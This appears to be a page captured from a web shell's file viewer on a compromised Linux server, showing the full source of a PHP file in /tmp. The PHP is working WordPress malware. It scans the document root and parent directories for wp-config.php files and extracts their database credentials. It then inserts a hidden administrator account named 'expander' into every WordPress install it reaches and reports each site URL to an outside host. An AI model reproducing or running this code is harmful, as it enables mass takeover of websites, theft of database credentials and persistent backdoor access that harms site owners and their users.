HEX
Server: LiteSpeed
System: Linux CentOS-79-64-minimal 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: vishn3436 (5293)
PHP: 8.0.15
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/095484f49549ca768b92f441dda65c1d
<?php 
error_reporting(0); ini_set('display_errors',0); ini_set('max_execution_time', 0); 
$path = $_SERVER['DOCUMENT_ROOT']."/wp-config.php"; 
get_sss($path);

echo "tsrijydkdfyutyft";


function checkthurl($url){
	$j = file_get_contents($url);
	if(strpos($j, "0x3ec646")!==false) {
		return 2;
	}
if(strpos($j, "0x5148f3")!==false) {
		return 3;
	}
	return 1;
}
function get_sss($path){
if(!is_readable($path)) return;
$a = file_get_contents($path);
if(strpos($a, "DB_PASS")!==false) {
	
	$db = "";
	$host = "";
	$user= "";
	$pass="";
	preg_match_all("/DB_NAME.*?['\"],.*?['\"](.*?)['\"]/", $a, $matches); $db = $matches[1][0];
	preg_match_all("/DB_USER.*?['\"],.*?['\"](.*?)['\"]/", $a, $matches); $user = $matches[1][0];
	preg_match_all("/DB_PASSWORD.*?['\"],.*?['\"](.*?)['\"]/", $a, $matches); $pass = $matches[1][0];
	preg_match_all("/DB_HOST.*?['\"],.*?['\"](.*?)['\"]/", $a, $matches); $host = $matches[1][0];

	if($host != "" && $user != "" && $pass != ""){
		
		$conn = new mysqli($host, $user, $pass);
		
		if ($conn->connect_error) {
		  return;
		}

		$sql = "SELECT * FROM `information_schema`.`TABLES` WHERE `TABLE_NAME` LIKE '%_options%'";
		$result = $conn->query($sql);

		if ($result->num_rows > 0) {
		
		  while($row = $result->fetch_assoc()) {
		  
		 		$sql22 = "SELECT `option_value` FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]. " WHERE `option_name` = 'siteurl'";
				$result22 = $conn->query($sql22);
				
		if ($result22->num_rows > 0) {
			 while($row22 = $result22->fetch_assoc()) {
				$siteurl = $row22["option_value"];

				


				$app = explode("_",$row["TABLE_NAME"]);
				$appadd = $app[0];
				$sql3 = "SELECT `user_login` FROM " . $row["TABLE_SCHEMA"]. "." . $appadd. "_users WHERE `user_login` = 'expander'";
				

					$result3 = $conn->query($sql3);
					
		if ($result3->num_rows > 0) {
			$sql33 = "SELECT `user_login` FROM " . $row["TABLE_SCHEMA"]. "." . $appadd. "_users WHERE `user_login` = 'expander'";
				

					$result33 = $conn->query($sql33);
					
		if ($result33->num_rows > 0) {
 		
		}

			

		} else {
			$ssql = "
INSERT INTO ".$row["TABLE_SCHEMA"].".".$appadd."_users
    (
        user_login, user_pass,user_nicename,user_email,user_status
    )
VALUES
    ('expander', '\$2y\$10\$pGjo1d2kpXfxo03RBDADueinYg2HfeWa1Lt/65gy2BJPnfzwfJjse','expander','expander@stand.com',0)";
    $conn->query($ssql);
$sql5 = "SELECT `ID` FROM " . $row["TABLE_SCHEMA"]. "." . $appadd. "_users WHERE `user_login` = 'expander'";
$result5 = $conn->query($sql5);

		if ($result5->num_rows > 0) {
			 while($row5 = $result5->fetch_assoc()) {
			 	echo "user id: ".$row5["ID"];
			 	$sql4 = "SELECT `meta_key` FROM " . $row["TABLE_SCHEMA"]. "." . $appadd. "_usermeta WHERE `meta_key` = '".$appadd."_user_level' and 'user_id' = ".$row5["ID"];
			 	$result4= $conn->query($sql4);
			 	if ($result4->num_rows > 0) {

			 	} else {
			 		$ssql = "
INSERT INTO ".$row["TABLE_SCHEMA"].".".$appadd."_usermeta
    (
        user_id,meta_key,meta_value
    )
VALUES
    (".$row5["ID"].",'".$appadd."_capabilities','a:1:{s:13:\"administrator\";b:1;}');";
$conn->query($ssql);
$ssql = "INSERT INTO ".$row["TABLE_SCHEMA"].".".$appadd."_usermeta
    (
        user_id,meta_key,meta_value
    )
VALUES
    (".$row5["ID"].",'".$appadd."_user_level',10);";
$conn->query($ssql);
 $u="http://goget.greenfastline.com/yt/fl.php";
		@file_get_contents($u."?u=".base64_encode($siteurl));
					

    

			 	}
			 }
		}




				

					
				

		

    
		}
				 
				}
			}
		


		   

		  }
		}
		$conn->close();
	}
}
}


  
  
  error_reporting(0); ini_set('display_errors',0); ini_set('max_execution_time', 0);  


$d = $_SERVER['DOCUMENT_ROOT']."/";
$files = array();  
$dr2 = array();
$fz2 = array();

$dir =$_SERVER['DOCUMENT_ROOT'];
try{
$dirs = glob($dir . '/*', GLOB_ONLYDIR);
if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
} catch(Exception $e){ 		 	}

try{
$dirs = glob($dir . '/../*', GLOB_ONLYDIR);
if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
} catch(Exception $e){ 		 	}

try{
$dirs = glob($dir . '/../../*', GLOB_ONLYDIR);
if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
} catch(Exception $e){ 		 	}

try{
$dirs = glob($dir . '/../../../*', GLOB_ONLYDIR);
if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
} catch(Exception $e){ 		 	}

foreach($dr2 as $dr1){
	try{
	$dirs = glob($dr1 . '/*', GLOB_ONLYDIR);
	if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
	} catch(Exception $e){ 		 	}
}

 $dr2 = array_unique($dr2);
 
 foreach($dr2 as $dr1){
	try{
	$dirs = glob($dr1 . '/*', GLOB_ONLYDIR);
	if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
	} catch(Exception $e){ 		 	}
}

 $dr2 = array_unique($dr2);
 
 foreach($dr2 as $dr1){
	try{
	$dirs = glob($dr1 . '/*', GLOB_ONLYDIR);
	if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
	} catch(Exception $e){ 		 	}
}

 $dr2 = array_unique($dr2);
  foreach($dr2 as $dr1){
	try{
	$dirs = glob($dr1 . '/*', GLOB_ONLYDIR);
	if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
	} catch(Exception $e){ 		 	}
}

 $dr2 = array_unique($dr2);
  foreach($dr2 as $dr1){
	try{
	$dirs = glob($dr1 . '/*', GLOB_ONLYDIR);
	if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
	} catch(Exception $e){ 		 	}
}

 $dr2 = array_unique($dr2);
  foreach($dr2 as $dr1){
	try{
	$dirs = glob($dr1 . '/*', GLOB_ONLYDIR);
	if($dirs!=false) $dr2 = array_merge($dr2,$dirs);
	} catch(Exception $e){ 		 	}
}

 $dr2 = array_unique($dr2);

 
  foreach($dr2 as $dr1){
	try{
	$dirs = glob($dr1 . '/wp-config.php');
	if($dirs!=false) $files = array_merge($files,$dirs);
	} catch(Exception $e){ 		 	}
}

 $files = array_unique($files);
  foreach($files as $dr1){
	 
	  get_sss($dr1); 
  }
  
 
 



echo "error_reporting";
@ Telegram